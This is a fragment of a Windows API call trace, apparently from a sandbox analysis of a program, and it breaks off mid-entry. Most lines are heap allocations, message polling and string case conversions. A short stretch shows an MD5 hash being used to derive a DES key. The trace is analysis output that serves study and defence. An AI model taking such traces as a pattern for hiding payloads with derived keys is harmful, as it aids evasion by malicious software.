[0242.879] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0242.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0242.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0242.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0242.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0242.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0242.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0242.879] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0242.879] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0242.879] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0242.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0242.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0242.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0242.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0242.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0242.879] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0242.879] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0242.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0242.880] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0242.880] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0242.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0242.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0242.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0242.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0242.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0242.880] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0242.880] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0242.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0242.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0242.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0242.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0242.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0242.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0242.880] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0242.880] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0242.880] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0242.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0242.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0242.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0242.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0242.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0242.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0242.881] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0242.881] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0242.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0242.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0242.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0242.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0242.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0242.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0242.881] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0242.881] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0242.881] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0242.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0242.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0242.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0242.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0242.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0242.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0242.882] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0242.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0242.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0242.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0242.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0242.882] CryptCreateHash (in: hProv=0xad2720, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0242.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0242.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0242.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0242.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0242.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0242.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0242.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0242.882] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0242.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0242.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0242.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0242.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0242.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0242.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0242.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0242.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0242.883] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.883] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0242.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0242.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0242.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0242.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0242.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0242.884] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0242.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0242.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0242.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0242.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0242.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0242.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0242.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0242.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0242.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0242.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0242.884] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0242.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0242.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0242.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0242.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0242.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0242.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0242.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0242.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0242.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0242.885] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0242.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0242.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0242.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0242.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0242.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0242.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0242.885] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0242.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0242.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0242.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0242.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0242.886] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0242.886] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0242.886] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0242.886] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0242.886] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0242.886] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0242.886] CryptHashData (hHash=0xaa5820, pbData=0x24b1828, dwDataLen=0x3, dwFlags=0x1) returned 1 [0242.887] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.887] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.887] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.887] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0242.887] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0242.887] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0242.887] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0242.887] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0242.887] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0242.887] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0242.887] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0242.888] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0242.888] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0242.888] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0242.888] CryptDeriveKey (in: hProv=0xad2720, Algid=0x6601, hBaseData=0xaa5820, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5920) returned 1 [0242.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0242.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0242.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0242.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0242.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0242.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0242.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0242.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0242.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0242.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0242.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0242.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0242.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0242.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0242.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0242.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0242.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0242.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0242.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0242.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0242.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0242.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0242.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0242.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0242.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0242.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0242.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0242.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0242.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0242.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0242.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0242.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0242.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0242.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0242.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0242.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0242.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0242.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0242.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0242.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0242.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0242.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0242.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0242.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0242.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0242.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0242.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0242.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0242.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0242.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0242.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0242.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0242.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0242.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0242.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0242.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0242.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0242.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0242.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0242.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0242.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0242.892] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0242.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0242.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0242.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0242.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0242.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0242.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0242.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0242.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0242.893] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, 